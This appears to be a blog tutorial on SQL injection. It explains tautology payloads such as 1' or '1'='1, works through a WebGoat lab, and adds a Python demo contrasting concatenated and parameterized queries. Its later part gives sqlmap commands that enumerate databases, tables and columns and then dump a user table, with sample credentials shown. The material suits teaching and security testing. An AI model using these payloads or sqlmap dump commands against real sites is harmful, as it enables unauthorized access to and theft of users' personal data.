Hey everyone. Welcome to this brand new tutorial, in which we are going to look at “SQL Injection”, one of the most dangerous web application vulnerabilities listed in the OWASP Top 10.
What really is SQL Injection?
SQL injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s crafted input can then trick the interpreter into executing unintended commands or accessing data from the site’s database without any authorization.
The main purpose of SQL Injection is to dump the whole database to the attacker, and that can be seriously dangerous. An attacker can change users’ credentials such as their passwords, obtain users’ credit card numbers, and much more. The attacker can also delete the whole database, which can be a disaster for the company. That is why it is considered the most dangerous vulnerability: if exploited, the personal data of each and every user is at risk.
Types of SQL Injections
SQL injection is generally divided into four sub-categories:
- Classic SQLI
- Blind or Inference SQL injection
- Database management system-specific SQLI
- Compounded SQLI
SQL Injection requires input fields to carry out the attack. An attacker constructs the input in such a way that it gets executed as part of a database command after being transmitted from the browser to the web application.
A successful SQL Injection attack requires the attacker to craft a syntactically correct SQL query. If the application returns an error message when the attacker submits a malformed query, or gives out details of the database or the table names, then it is vulnerable to SQL Injection.
Often the application will show an error but hide the details, such as which database or version is being used. In that case the tester must reverse engineer the logic of the original query.
How to test for SQL Injection (manual testing)?
In order to perform a SQL injection attack, we first need to make a list of the inputs which interact with the database server to access data. These can be the username and password in a login form, search queries, etc.
Let’s consider an e-commerce website. A normal user visits the website and logs in to his account to see the offers available only to him.
Now how does this login really work in the background?
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Consider the above query. It takes the data entered by the user and matches it against the information in the database. If both the username and password match, the user is logged in; otherwise access is denied.
Now what an attacker does here is inject code instead of giving a valid username and password:
1' or '1' = '1 in place of the username and 1' or '1' = '1 in place of the password
So the query now becomes something like this:
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
Now if the application is vulnerable to SQL Injection it will return a set of rows, because the condition '1' = '1' is always true. Note that AND binds tighter than OR, so the query is evaluated as Username='1' OR ('1' = '1' AND Password='1') OR '1' = '1', which still matches every row.
One thing which will come in quite handy is finding out which database the application is using. There are syntactical differences between Oracle, MSSql, and MySQL, which is why some queries might not work as expected.
Now let’s see some practical SQL Injection.
Here is an example of String SQL injection from WebGoat.
In this task, we had to input the last name in such a way that the result is a syntactically correct SQL query which dumps all the details from the database. Here, the query used by the application was also given; that won’t happen in real life. You have to try injecting different inputs there so that you get some error or information which tells you which query is being used in the backend.
The query in this case was:
SELECT * FROM user_data WHERE last_name = 'Your Name'
So we injected Smith' OR '1'='1 there and the query became:
SELECT * FROM user_data WHERE last_name = 'Smith' OR '1'='1'
The second condition is always TRUE, so it gives out all the records from the user_data table.
It’s just a simple example, but this is how SQL injection works in general.
It would take a whole page to write a complete tutorial on SQL injection, so we recommend you check the different types of manual testing from this page. Meanwhile, check out some YouTube tutorials and solve SQL injection problems from DVWA, WebGoat, and Mutillidae to get the hang of it.
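The login query and the WebGoat example above are the same mechanism, and the parameterized query is the fix the tutorial does not show. This added example (not part of the original tutorial) runs the tutorial’s exact payload against a constructed in-memory SQLite Users table through both a string-concatenated query and a parameterized one, and also shows why a lone single quote, the probe used later in the sqlmap section, produces an error only from the concatenated version. The table contents and the use of SQLite are assumptions.

```python
import sqlite3

# Constructed sample data: an in-memory Users table shaped like the one in the tutorial.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """String-concatenated query, exactly the shape shown in the tutorial."""
    query = ("SELECT * FROM Users WHERE Username='" + username +
             "' AND Password='" + password + "'")
    return conn.execute(query).fetchall()

def login_safe(conn, username, password):
    """Parameterized query: user input is bound as data and never parsed as SQL."""
    query = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(query, (username, password)).fetchall()

def demo():
    conn = make_db()
    payload = "1' or '1' = '1"  # the tutorial's payload, used as both username and password
    results = {
        "valid_vulnerable": len(login_vulnerable(conn, "alice", "s3cret")),   # 1 row
        "valid_safe": len(login_safe(conn, "alice", "s3cret")),               # 1 row
        "payload_vulnerable": len(login_vulnerable(conn, payload, payload)),  # every row
        "payload_safe": len(login_safe(conn, payload, payload)),              # 0 rows
    }
    # A lone single quote breaks the concatenated query with a syntax error:
    # that error is the signal that input reached the SQL parser.
    try:
        login_vulnerable(conn, "'", "x")
        results["quote_error_vulnerable"] = False
    except sqlite3.OperationalError:
        results["quote_error_vulnerable"] = True
    # The same quote is just a string value to the parameterized query.
    results["quote_rows_safe"] = len(login_safe(conn, "'", "x"))
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```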
SQL injection using Sqlmap
We just saw how manual testing works, but there is also a wonderful automation tool known as sqlmap for finding and exploiting SQL injection vulnerabilities in a website.
Sqlmap is one of the most powerful and well-known automation tools for SQL injection. The only thing sqlmap requires is a vulnerable URL. It can extract the whole database: tables, columns and all the data inside those columns. For downloading and installing sqlmap go here.
Now, let’s consider a PHP page which has an id parameter which looks something like this:
If we try inserting a single quote into the id parameter in the URL, we can check whether the application does anything unusual or shows us an unexpected error message.
If the developer did not escape the id parameter properly, it will give us an error. For the sake of this tutorial, let’s assume it behaves unexpectedly.
The first and most basic sqlmap command is the one below. The -u option specifies the URL. This command checks whether the parameter is really vulnerable to SQL injection or not.
$ python sqlmap.py -u "http://www.test.com/index.php?id=23"
This command also gives us information like the operating system and the database being used, along with its version number. Now that we know the parameter is vulnerable to SQL injection, we dig a little deeper.
- Getting the databases
  To find out all the databases, we use the following command. The --dbs option lists all the databases.
  $ python sqlmap.py -u "http://www.test.com/index.php?id=23" --dbs
  Let’s assume that we get three databases: information_schema
- Getting the tables inside a database
  Now the next step is to find out all the tables inside a database. For this, we use the command below:
  $ python sqlmap.py -u "http://www.test.com/index.php?id=23" --tables -D users
  The --tables option lists all the tables and the -D option specifies the database, which in this case is users. Let’s say we get 2 tables, but we are interested in the one which holds users’ personal information, a table named personal.
- Getting the columns inside the table
  To get all the columns inside the table, we use the command below:
  $ python sqlmap.py -u "http://www.test.com/index.php?id=23" --columns -D users -T personal
  It will give us the layout of the table:
  | Column   | Type         |
  | email    | text         |
  | hash     | varchar(128) |
  | id       | int(11)      |
  | name     | text         |
  | password | text         |
- Getting the data for each column
  Now, this is what we hackers truly desire: the data. This command dumps the data of the entire table:
  $ python sqlmap.py -u "http://www.test.com/index.php?id=23" --dump -D users -T personal
  The output will look something like this:
  | id | hash               | name  | email                          | password  |
  | 1  | 5DIpzzDHFOwnCvPonu | admin | email@example.com              | letmein   |
  | 2  | 8DIpzhfDHFkyndCvPo | john  | firstname.lastname@example.org | hackerxss |
These are the basic sqlmap commands. Sqlmap also has several advanced features; for those, check its official page. There are other tools like SqlNinja as well, which you can check out from here.
SQL injection is a very broad topic in itself, but it’s like a blessing for bug bounty hunters, because companies pay a good bounty if you can find a critical vulnerability such as SQL Injection. We will be writing on topics like time-based SQL injection and various advanced SQL Injections in the meantime. Stay tuned for that. Also, if you have any queries or are having any problems with SQL Injection, please comment below and we will surely help you.
Till then, happy hacking. :)